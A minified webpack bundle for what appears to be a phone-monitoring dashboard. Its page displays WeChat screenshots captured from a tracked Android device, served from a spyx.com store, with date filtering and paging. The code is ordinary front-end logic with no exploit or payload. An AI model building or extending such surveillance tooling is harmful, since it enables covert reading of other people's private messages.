(self["webpackChunk_N_E"] = self["webpackChunk_N_E"] || []).push([[8920],{

/***/ 85669:
/***/ (function(__unused_webpack_module, __unused_webpack_exports, __webpack_require__) {


    (window.__NEXT_P = window.__NEXT_P || []).push([
      "/android/local/we-chat",
      function () {
        return __webpack_require__(98103);
      }
    ]);
    if(false) {}
  

/***/ }),

/***/ 25542:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(85893);
/* harmony import */ var react__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(67294);
/* harmony import */ var next_image__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(25675);
/* harmony import */ var next_image__WEBPACK_IMPORTED_MODULE_2___default = /*#__PURE__*/__webpack_require__.n(next_image__WEBPACK_IMPORTED_MODULE_2__);
/* harmony import */ var _index_module_scss__WEBPACK_IMPORTED_MODULE_7__ = __webpack_require__(52714);
/* harmony import */ var _index_module_scss__WEBPACK_IMPORTED_MODULE_7___default = /*#__PURE__*/__webpack_require__.n(_index_module_scss__WEBPACK_IMPORTED_MODULE_7__);
/* harmony import */ var dayjs__WEBPACK_IMPORTED_MODULE_3__ = __webpack_require__(27484);
/* harmony import */ var dayjs__WEBPACK_IMPORTED_MODULE_3___default = /*#__PURE__*/__webpack_require__.n(dayjs__WEBPACK_IMPORTED_MODULE_3__);
/* harmony import */ var src_components_NoData__WEBPACK_IMPORTED_MODULE_4__ = __webpack_require__(96665);
/* harmony import */ var src_components_RangePickerBox__WEBPACK_IMPORTED_MODULE_5__ = __webpack_require__(15171);
/* harmony import */ var src_components_ContentLoading__WEBPACK_IMPORTED_MODULE_6__ = __webpack_require__(74743);








const ImageItem = (param)=>{
    let { imageUrl , date  } = param;
    const [imageError, setImageError] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(false);
    return !imageError ? /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
        className: (_index_module_scss__WEBPACK_IMPORTED_MODULE_7___default().box_height),
        style: {
            display: "flex",
            justifyContent: "center"
        },
        children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
            className: (_index_module_scss__WEBPACK_IMPORTED_MODULE_7___default().img_box),
            style: {
                display: "flex",
                flexDirection: "column",
                alignItems: "center"
            },
            children: [
                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("span", {
                    style: {
                        margin: "10px 0"
                    },
                    children: dayjs__WEBPACK_IMPORTED_MODULE_3___default()(date).format("YYYY-MM-DD HH:mm:ss")
                }),
                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_2___default()), {
                    style: {
                        width: "100%"
                    },
                    src: imageUrl,
                    alt: "img",
                    width: 100,
                    height: 100,
                    onError: ()=>setImageError(true)
                })
            ]
        })
    }) : null;
};
/**
 * @param {Object} props
 * @param {Array} props.imgData
 * @param {(range: { startTime: number, endTime: number } | null) => void} [props.onDateRangeChange]
 *   选中完整区间后回调毫秒 startTime/endTime，由上层带参请求接口；清空传 null
 * @param {boolean} [props.loading]
 */ const ContactImgBox = (param)=>{
    let { imgData , onDateRangeChange , loading =false , scrollContainerRef  } = param;
    const [selectedDates, setSelectedDates] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(null);
    const handleDateChange = (dates)=>{
        if ((dates === null || dates === void 0 ? void 0 : dates.length) === 2 && dates[0] && dates[1]) {
            setSelectedDates(dates);
            onDateRangeChange === null || onDateRangeChange === void 0 ? void 0 : onDateRangeChange({
                startTime: dayjs__WEBPACK_IMPORTED_MODULE_3___default()(dates[0]).startOf("day").valueOf(),
                endTime: dayjs__WEBPACK_IMPORTED_MODULE_3___default()(dates[1]).endOf("day").valueOf()
            });
        } else if (!dates || dates.length === 0) {
            setSelectedDates(null);
            onDateRangeChange === null || onDateRangeChange === void 0 ? void 0 : onDateRangeChange(null);
        } else {
            setSelectedDates(dates);
        }
    };
    const handleClear = ()=>{
        setSelectedDates(null);
        onDateRangeChange === null || onDateRangeChange === void 0 ? void 0 : onDateRangeChange(null);
    };
    return /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
        ref: scrollContainerRef,
        className: "relative w-full h-[calc(var(--vh2)*100-90px)] overflow-y-auto",
        children: [
            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                className: "w-full flex justify-center mb-[20px]",
                children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(src_components_RangePickerBox__WEBPACK_IMPORTED_MODULE_5__/* ["default"] */ .Z, {
                    value: selectedDates,
                    onChange: handleDateChange,
                    onClear: handleClear
                })
            }),
            loading ? /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                className: "relative min-h-[200px] flex",
                children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(src_components_ContentLoading__WEBPACK_IMPORTED_MODULE_6__/* ["default"] */ .Z, {})
            }) : imgData.length > 0 ? imgData.map((row, index)=>/*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(ImageItem, {
                    imageUrl: "https://cos.spyx.com/".concat(row.thumb.url),
                    date: row.date
                }, row.date != null ? "".concat(row.date, "-").concat(index) : index)) : /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(src_components_NoData__WEBPACK_IMPORTED_MODULE_4__/* ["default"] */ .Z, {})
        ]
    });
};
/* harmony default export */ __webpack_exports__["Z"] = (ContactImgBox);


/***/ }),

/***/ 74743:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(85893);
/* harmony import */ var next_image__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(25675);
/* harmony import */ var next_image__WEBPACK_IMPORTED_MODULE_1___default = /*#__PURE__*/__webpack_require__.n(next_image__WEBPACK_IMPORTED_MODULE_1__);
/* harmony import */ var src_utils_i18n__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(61906);
/* harmony import */ var _ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3__ = __webpack_require__(74249);
/* harmony import */ var _ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3___default = /*#__PURE__*/__webpack_require__.n(_ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3__);




const ContentLoading = (param)=>{
    let { label , fullScreen =false , className =""  } = param;
    const { t  } = (0,src_utils_i18n__WEBPACK_IMPORTED_MODULE_2__/* .useTranslation */ .$G)("common");
    const text = label || t("Loading...");
    return /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
        role: "status",
        "aria-live": "polite",
        "aria-label": text,
        className: "".concat((_ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3___default().contentLoadingRoot), " ").concat(fullScreen ? (_ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3___default().contentLoadingRootFullScreen) : "", " ").concat(className).trim(),
        children: [
            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_1___default()), {
                src: "/images/loading/spinner.svg",
                alt: "",
                width: 64,
                height: 64,
                className: (_ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3___default().contentLoadingSpinner),
                "aria-hidden": "true",
                priority: true
            }),
            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                className: (_ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3___default().contentLoadingLabel),
                children: text
            })
        ]
    });
};
/* harmony default export */ __webpack_exports__["Z"] = (ContentLoading);


/***/ }),

/***/ 96665:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(85893);
/* harmony import */ var next_router__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(11163);
/* harmony import */ var next_router__WEBPACK_IMPORTED_MODULE_1___default = /*#__PURE__*/__webpack_require__.n(next_router__WEBPACK_IMPORTED_MODULE_1__);
/* harmony import */ var react__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(67294);
/* harmony import */ var src_utils_i18n__WEBPACK_IMPORTED_MODULE_3__ = __webpack_require__(61906);




const NoData = ()=>{
    const { t , locale  } = (0,src_utils_i18n__WEBPACK_IMPORTED_MODULE_3__/* .useTranslation */ .$G)("common");
    const [text, setText] = (0,react__WEBPACK_IMPORTED_MODULE_2__.useState)("");
    const [text2, setText2] = (0,react__WEBPACK_IMPORTED_MODULE_2__.useState)("");
    const [href, setHref] = (0,react__WEBPACK_IMPORTED_MODULE_2__.useState)("");
    const [hrefText, setHrefText] = (0,react__WEBPACK_IMPORTED_MODULE_2__.useState)("");
    const router = (0,next_router__WEBPACK_IMPORTED_MODULE_1__.useRouter)();
    (0,react__WEBPACK_IMPORTED_MODULE_2__.useEffect)(()=>{
        const path = window.location.pathname;
        if (path.indexOf("android") != -1) {
            if (path.indexOf("android/local") != -1) {
                setText(t("If there is no data for only some of the features please go to the"));
                setText2(t("page to check Also the app cant track social media data before connection so please be patient if the app is fully authorized"));
                setHrefText(t("Permission check"));
                setHref("".concat("https://test-ms-dashboard.gbyte.com.cn", "/android/local/permission-check"));
                ;
            } else {
                setText(t("Please enable Google backup See"));
                setText2(t("for details"));
                setHrefText(t("here"));
            // if (locale && locale != 'en') {
            //   setHref(
            //     '/guide/back-up-android' + '-' + (locale == 'it-ch' ? 'it' : locale)
            //   )
            // } else {
            //   setHref('/guide/back-up-android')
            // }
            }
        } else {
            setText(t("Please enable iCloud backup See"));
            setText2(t("for details"));
            setHrefText(t("here"));
        // if (locale && locale != 'en') {
        //   setHref('/guide/back-up-ios' + '-' + (locale == 'it-ch' ? 'it' : locale))
        // } else {
        //   setHref('/guide/back-up-ios')
        // }
        }
    }, [
        locale,
        t
    ]);
    return /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.Fragment, {
        children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
            className: "!h-[calc(var(--vh2)*100-240px)] smj:!h-[calc(var(--vh2)*100-115px)] w-full mt-5 [box-shadow:0px_0px_12px_0px_#00000021] rounded-[10px] bg-white flex justify-center items-center",
            children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                className: "text-center px-2",
                children: [
                    t("It appears theres no data to show here yet"),
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("br", {}),
                    t("If data exists it may take up to 1 hour to download and appear"),
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("br", {}),
                    t("We suggest checking back in a little while")
                ]
            })
        })
    });
};
/* harmony default export */ __webpack_exports__["Z"] = (NoData);


/***/ }),

/***/ 15171:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(85893);
/* harmony import */ var _ant_design_icons__WEBPACK_IMPORTED_MODULE_3__ = __webpack_require__(4340);
/* harmony import */ var antd__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(15378);
/* harmony import */ var src_utils_i18n__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(61906);




const { RangePicker  } = antd__WEBPACK_IMPORTED_MODULE_2__/* ["default"] */ .Z;
const RangePickerBox = (param)=>{
    let { className , rangePickerClassName , onClear , ...props } = param;
    const { t  } = (0,src_utils_i18n__WEBPACK_IMPORTED_MODULE_1__/* .useTranslation */ .$G)("common");
    return /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
        className: "relative max-w-[400px] " + (className || ""),
        children: [
            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(RangePicker, {
                placeholder: [
                    t("Start date"),
                    t("End date")
                ],
                allowClear: false,
                picker: "date",
                inputReadOnly: true,
                format: "YYYY-MM-DD",
                className: "h-[40px] text-[16px] w-full max-w-[400px] " + (rangePickerClassName || ""),
                ...props
            }),
            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(_ant_design_icons__WEBPACK_IMPORTED_MODULE_3__/* ["default"] */ .Z, {
                className: "text-[#D9D9D9] absolute z-[1] translate-y-[-50%] right-[36px] top-[50%] cursor-pointer hover:text-[#bfbfbf]",
                onClick: (e)=>{
                    e.stopPropagation();
                    onClear === null || onClear === void 0 ? void 0 : onClear(e);
                }
            })
        ]
    });
};
/* harmony default export */ __webpack_exports__["Z"] = (RangePickerBox);


/***/ }),

/***/ 85314:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export */ __webpack_require__.d(__webpack_exports__, {
/* harmony export */   "M": function() { return /* binding */ useAndroidLocalImageList; }
/* harmony export */ });
/* harmony import */ var react__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(67294);
/* harmony import */ var src_api_dashboard__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(95629);
/* harmony import */ var src_hooks_useDeviceScopedInit__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(82017);
/* harmony import */ var src_utils_readAndroidLocalContext__WEBPACK_IMPORTED_MODULE_3__ = __webpack_require__(26771);




/**
 * Android Local 图片/截图分页列表 Hook（滚动触底加载），设备切换时隔离旧响应。
 * 日期筛选通过 params.startTime / endTime（毫秒）走接口重拉，非本地过滤。
 *
 * @param {Object} options
 * @param {string} options.category - 接口 category，如 INSTAGRAM_SCREENSHOT
 * @param {number} options.limit - 每页条数
 * @returns {{ imgData: Array, loading: boolean, initialLoading: boolean, total: number, setDateRange: Function }}
 */ function useAndroidLocalImageList(param) {
    let { category , limit  } = param;
    const [imgData, setImgData] = (0,react__WEBPACK_IMPORTED_MODULE_0__.useState)([]);
    const [loading, setLoading] = (0,react__WEBPACK_IMPORTED_MODULE_0__.useState)(true);
    const [hasLoaded, setHasLoaded] = (0,react__WEBPACK_IMPORTED_MODULE_0__.useState)(false);
    const [total, setTotal] = (0,react__WEBPACK_IMPORTED_MODULE_0__.useState)(0);
    const scopeRef = (0,react__WEBPACK_IMPORTED_MODULE_0__.useRef)(null);
    const scrollContainerRef = (0,react__WEBPACK_IMPORTED_MODULE_0__.useRef)(null);
    const pageRef = (0,react__WEBPACK_IMPORTED_MODULE_0__.useRef)({
        offset: 0,
        maxNum: false,
        loading: false
    });
    /** @type {React.MutableRefObject<{ startTime: number, endTime: number } | null>} */ const dateRangeRef = (0,react__WEBPACK_IMPORTED_MODULE_0__.useRef)(null);
    const fetchGenRef = (0,react__WEBPACK_IMPORTED_MODULE_0__.useRef)(0);
    const loadPage = (0,react__WEBPACK_IMPORTED_MODULE_0__.useCallback)(async function(offset) {
        let scope = arguments.length > 1 && arguments[1] !== void 0 ? arguments[1] : scopeRef.current;
        if (!scope || pageRef.current.loading || pageRef.current.maxNum) return;
        const gen = fetchGenRef.current;
        pageRef.current.loading = true;
        const { context , signal , isCurrent  } = scope;
        try {
            var ref;
            const params = {
                category,
                deviceUdid: (0,src_utils_readAndroidLocalContext__WEBPACK_IMPORTED_MODULE_3__/* .readLocalDeviceUdid */ .S)(context),
                offset,
                limit
            };
            const range = dateRangeRef.current;
            if ((range === null || range === void 0 ? void 0 : range.startTime) != null) params.startTime = range.startTime;
            if ((range === null || range === void 0 ? void 0 : range.endTime) != null) params.endTime = range.endTime;
            const result = await (0,src_api_dashboard__WEBPACK_IMPORTED_MODULE_1__/* .getLocalAndroidAll */ .gH)({
                username: (0,src_utils_readAndroidLocalContext__WEBPACK_IMPORTED_MODULE_3__/* .readUserEmail */ .t)(),
                params
            }, {
                signal
            });
            if (!isCurrent() || gen !== fetchGenRef.current) return;
            const contents = result === null || result === void 0 ? void 0 : (ref = result.data) === null || ref === void 0 ? void 0 : ref.contents;
            if (contents) {
                setImgData((old)=>offset === 0 ? [
                        ...contents
                    ] : [
                        ...old,
                        ...contents
                    ]);
                setTotal(result.data.totalCount);
                pageRef.current.offset = offset;
                if (contents.length < limit) pageRef.current.maxNum = true;
            } else {
                if (offset === 0) {
                    setImgData([]);
                    setTotal(0);
                }
                pageRef.current.maxNum = true;
            }
            setHasLoaded(true);
            setLoading(false);
        } catch (error) {
            if (isCurrent() && gen === fetchGenRef.current && (error === null || error === void 0 ? void 0 : error.code) !== "ERR_CANCELED") {
                ;
                setHasLoaded(true);
                setLoading(false);
            }
        } finally{
            if (isCurrent() && gen === fetchGenRef.current) pageRef.current.loading = false;
        }
    }, [
        category,
        limit
    ]);
    const reloadFromStart = (0,react__WEBPACK_IMPORTED_MODULE_0__.useCallback)(()=>{
        const scope = scopeRef.current;
        if (!scope) return;
        fetchGenRef.current += 1;
        pageRef.current = {
            offset: 0,
            maxNum: false,
            loading: false
        };
        setLoading(true);
        loadPage(0, scope);
    }, [
        loadPage
    ]);
    /**
   * @param {{ startTime: number, endTime: number } | null} range - 毫秒时间戳；null 清除筛选
   */ const setDateRange = (0,react__WEBPACK_IMPORTED_MODULE_0__.useCallback)((range)=>{
        dateRangeRef.current = range;
        reloadFromStart();
    }, [
        reloadFromStart
    ]);
    // 设备切换：清空列表与日期筛选并重新加载第一页
    (0,src_hooks_useDeviceScopedInit__WEBPACK_IMPORTED_MODULE_2__/* .useDeviceScopedInit */ .A)((0,react__WEBPACK_IMPORTED_MODULE_0__.useCallback)((_, scope)=>{
        scopeRef.current = scope;
        dateRangeRef.current = null;
        fetchGenRef.current += 1;
        pageRef.current = {
            offset: 0,
            maxNum: false,
            loading: false
        };
        setImgData([]);
        setHasLoaded(false);
        setLoading(true);
        setTotal(0);
        loadPage(0, scope);
    }, [
        loadPage
    ]));
    (0,react__WEBPACK_IMPORTED_MODULE_0__.useEffect)(()=>{
        const handleScroll = ()=>{
            const page = pageRef.current;
            const container = scrollContainerRef.current;
            const isAtBottom = container ? container.scrollTop + container.clientHeight >= container.scrollHeight - 100 : window.scrollY + window.innerHeight >= document.documentElement.scrollHeight - 100;
            if (isAtBottom && !page.maxNum && !page.loading) {
                loadPage(page.offset + limit);
            }
        };
        const scrollContainer = scrollContainerRef.current;
        const scrollTarget = scrollContainer || window;
        scrollTarget.addEventListener("scroll", handleScroll);
        return ()=>scrollTarget.removeEventListener("scroll", handleScroll);
    }, [
        hasLoaded,
        limit,
        loadPage
    ]);
    return {
        imgData,
        loading,
        initialLoading: loading && !hasLoaded,
        total,
        setDateRange,
        scrollContainerRef
    };
}


/***/ }),

/***/ 82017:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export */ __webpack_require__.d(__webpack_exports__, {
/* harmony export */   "A": function() { return /* binding */ useDeviceScopedInit; }
/* harmony export */ });
/* harmony import */ var react__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(67294);
/* harmony import */ var react_redux__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(9473);
/* harmony import */ var src_store_apps_Common__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(34745);



/**

 * 当前选中设备变化时重新执行初始化逻辑（拉数、重置本地 state 等）。

 * 通过 requestKey 与 AbortSignal 丢弃切换前未完成的异步请求。

 *

 * @param {(deviceUser: string, scope: {

 *   context: Object,

 *   signal: AbortSignal,

 *   isCurrent: () => boolean

 * }) => void} initFn - 设备作用域初始化回调，需 useCallback 包裹

 */ function useDeviceScopedInit(initFn) {
    const deviceUser = (0,react_redux__WEBPACK_IMPORTED_MODULE_1__/* .useSelector */ .v9)((state)=>state.Common.deviceUser);
    const context = (0,react_redux__WEBPACK_IMPORTED_MODULE_1__/* .useSelector */ .v9)(src_store_apps_Common__WEBPACK_IMPORTED_MODULE_2__/* .selectDeviceContext */ .VQ);
    const requestKey = (0,react_redux__WEBPACK_IMPORTED_MODULE_1__/* .useSelector */ .v9)(src_store_apps_Common__WEBPACK_IMPORTED_MODULE_2__/* .selectDeviceRequestKey */ .rx);
    const contextRef = (0,react__WEBPACK_IMPORTED_MODULE_0__.useRef)(context);
    contextRef.current = context;
    const effectiveDeviceUser = deviceUser || (context === null || context === void 0 ? void 0 : context.accountId) || (context === null || context === void 0 ? void 0 : context.username);
    (0,react__WEBPACK_IMPORTED_MODULE_0__.useEffect)(()=>{
        if (!effectiveDeviceUser) return;
        const controller = new AbortController();
        let active = true;
        const scopedContext = contextRef.current;
        // 仅当 requestKey 仍与当前 Redux 一致时，才应用异步结果
        const isCurrent = ()=>{
            var ref;
            return active && !controller.signal.aborted && ((ref = contextRef.current) === null || ref === void 0 ? void 0 : ref.requestKey) === requestKey;
        };
        initFn(effectiveDeviceUser, {
            context: scopedContext,
            signal: controller.signal,
            isCurrent
        });
        return ()=>{
            active = false;
            controller.abort();
        };
    }, [
        effectiveDeviceUser,
        initFn,
        requestKey
    ]);
}


/***/ }),

/***/ 98103:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
__webpack_require__.r(__webpack_exports__);
/* harmony import */ var react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(85893);
/* harmony import */ var react__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(67294);
/* harmony import */ var src_core_components_local_android_contact_img_box__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(25542);
/* harmony import */ var react_redux__WEBPACK_IMPORTED_MODULE_3__ = __webpack_require__(9473);
/* harmony import */ var src_utils_i18n__WEBPACK_IMPORTED_MODULE_4__ = __webpack_require__(61906);
/* harmony import */ var src_store_apps_Common__WEBPACK_IMPORTED_MODULE_5__ = __webpack_require__(34745);
/* harmony import */ var src_hooks_useAndroidLocalImageList__WEBPACK_IMPORTED_MODULE_6__ = __webpack_require__(85314);
/* harmony import */ var src_components_ContentLoading__WEBPACK_IMPORTED_MODULE_7__ = __webpack_require__(74743);








const WeChat = ()=>{
    const dispatch = (0,react_redux__WEBPACK_IMPORTED_MODULE_3__/* .useDispatch */ .I0)();
    const { t  } = (0,src_utils_i18n__WEBPACK_IMPORTED_MODULE_4__/* .useTranslation */ .$G)("common");
    const { imgData , loading , initialLoading , setDateRange , scrollContainerRef  } = (0,src_hooks_useAndroidLocalImageList__WEBPACK_IMPORTED_MODULE_6__/* .useAndroidLocalImageList */ .M)({
        category: "WECHAT_SCREENSHOT",
        limit: 30
    });
    (0,react__WEBPACK_IMPORTED_MODULE_1__.useEffect)(()=>{
        const title = t("WeChat");
        dispatch((0,src_store_apps_Common__WEBPACK_IMPORTED_MODULE_5__/* .setCurrentTab */ .Lw)(title));
        return ()=>dispatch((0,src_store_apps_Common__WEBPACK_IMPORTED_MODULE_5__/* .setCurrentTab */ .Lw)(""));
    }, [
        dispatch,
        t
    ]);
    return /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.Fragment, {
        children: initialLoading ? /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
            className: "relative bg-[#FFF] drop-shadow-[0_0_12px_rgba(0,0,0,0.13)] rounded-[10px] h-[calc(var(--vh2)*100-90px)] w-full flex",
            children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(src_components_ContentLoading__WEBPACK_IMPORTED_MODULE_7__/* ["default"] */ .Z, {})
        }) : /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(src_core_components_local_android_contact_img_box__WEBPACK_IMPORTED_MODULE_2__/* ["default"] */ .Z, {
            imgData: imgData,
            loading: loading,
            onDateRangeChange: setDateRange,
            scrollContainerRef: scrollContainerRef
        })
    });
};
/* harmony default export */ __webpack_exports__["default"] = (WeChat);


/***/ }),

/***/ 74249:
/***/ (function(module) {

// extracted by mini-css-extract-plugin
module.exports = {"contentLoadingRoot":"ContentLoading_contentLoadingRoot__ypzGH","contentLoadingRootFullScreen":"ContentLoading_contentLoadingRootFullScreen__ZmB8e","contentLoadingSpinner":"ContentLoading_contentLoadingSpinner__4vCxU","content-loading-spin":"ContentLoading_content-loading-spin__K0YUP","contentLoadingLabel":"ContentLoading_contentLoadingLabel__S0w79"};

/***/ }),

/***/ 52714:
/***/ (function(module) {

// extracted by mini-css-extract-plugin
module.exports = {"box_height":"contact-img-box_box_height__Jo2a_","img_box":"contact-img-box_img_box__tWA5V"};

/***/ })

},
/******/ function(__webpack_require__) { // webpackRuntimeModules
/******/ var __webpack_exec__ = function(moduleId) { return __webpack_require__(__webpack_require__.s = moduleId); }
/******/ __webpack_require__.O(0, [5675,5432,9830,5170,1033,8914,3368,1675,5378,9774,2888,179], function() { return __webpack_exec__(85669); });
/******/ var __webpack_exports__ = __webpack_require__.O();
/******/ _N_E = __webpack_exports__;
/******/ }
]);